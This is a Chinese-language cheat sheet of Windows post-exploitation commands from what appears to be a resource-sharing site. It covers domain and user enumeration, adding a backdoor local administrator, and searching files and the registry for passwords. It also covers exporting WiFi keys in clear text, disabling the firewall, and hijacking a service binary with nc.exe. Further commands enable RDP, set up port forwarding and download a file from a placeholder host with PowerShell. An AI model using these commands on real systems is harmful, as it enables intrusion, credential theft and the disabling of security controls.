查看共享连接
net use
增加远程共享
net use \host /u:user pass
查看域中当前的主机列表
net view /domain
查看当前域中的用户
net user /domain
增加一个本地用户
net user user pass /add
将新增的用户加到本地管理员组
net localgroup “Administrators” user /add
查看域中的密码策略
net accounts /domain
查看本地组
net localgroup “Group”
查看域中的组信息
net group /domain
查看域中指定组的成员
net group “Domain group” /domain
查看当前机器所在的域名
net config workstation
查看当前服务器所在的域名
net config server
系统信息相关命令
显示系统信息
systeminfo
查看远程主机的系统信息
systeminfo /S ip /U domain\user /P Pwd
显示进程和服务信息
tasklist /svc
显示所有进程以及DLL信息
tasklist /m
显示进程和所有者
tasklist /v
查看远程主机的进程列表
tasklist /S ip /v
搜索所有 pdf 文件
dir /a /s /b c:\.pdf
显示服务信息
sc query
显示具体的服务信息(包括二进制路径和运行使用)
sc qc Spooler
找出文件名字包含 password 的文件
findstr /si password .txt
搜索敏感文件名称
dir /s *pass* == *cred* == *vnc* == *.config*
更改服务的二进制路径
sc config upnphost binpath= “C:\nc.exe”
修改系统服务的权限
sc config upnphost obj= “.\LocalSystem” password= “”
检查系统服务的权限
accesschk.exe -ucqv “Authenticated Users” * /accepteula
检查指定服务的权限
accesschk.exe -ucqv ServceName /accepteula
检查指定组在指定目录下的写权限
accesschk.exe -uwdqs “Authenticated Users” c:\ /accepteula
网络信息
打印路由表
route print
保存当前主机上的所有WiFi信息
netsh wlan export profile folder=. key=clear
设置当前配置禁用防火墙
netsh advfirewall set currentprofile state off
设置端口转发
netsh interface portproxy add v4tov4 listenport=3000 listenaddress=l.l.l.l connectport=4000 connectaddress=2.2.2.2
开启远程访问
启用远程访问
reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 0 /f
启用远程协助
reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fAllowToGetHelp /t REG_DWORD /d 1 /f
修改远程访问端口
reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp” /v PortNumber /t REG_DWORD /d 12345 /f
注册表操作
查找注册表中的密码
reg query HKLM /f password /t REG_SZ /s
查询 winlogon 信息
reg query “HKLM\Software\Microsoft\Windows NT\CurrentVersion\winlogon”
使用 powershell
下载文件
powershell -c “(new-object System.Net.WebClient).DownloadFile(http://blabla.com/test.txt,C:\Users\admin\Desktop\test.test)”
列出运行的服务
Get-Service I where object {$ .status -eq Running}
编译 C# 代码
1、切换到 .NET 目录
cd C:\Windows\Microsoft.NET\Framework64\v4.0.30319 (或者 .NET 的对应版本的目录)
2、编译 x86 版本
csc.exe /unsafe /reference:”C:\path\to\System.Management.Automation.dll” /reference:System.IO.Compression.dll /out:<out_file_name> /platform:x86 “/cs/files/dir/*.cs”
3、编译 x64 版本
csc.exe /unsafe /reference:”C:\path\to\System.Management.Automation.dll” /reference:System.IO.Compression.dll /out:<out_file_name> /platform:x64 “/cs/files/dir/*.cs”
1. 本站所分享资料部分来自互联网公开渠道获取,仅供会员学习交流使用,请于24小时内删除,尊重原作者及出版方,如认为本站有使用不当的地方,或侵犯了您的权益,请联系本站工作人员,我们会及时删除。如果遇到付费才可观看的文章,建议升级本站VIP,全站所有资源“任意下免费看”。
2. 本站收集整理各大网赚平台的付费资源,仅提供资源分享,不提供任何的一对一教学指导,不提供任何收益保障,具体请自行分辨测试,如遇充值环节或绑定支付账户或输入支付密码之类的异常步骤,建议停止操作,是否有风险请自行甄别,本站概不负责!
3. 有的教程如果出现无法下载或者无内容说明链接失效了,请联系站长进行处理售后。
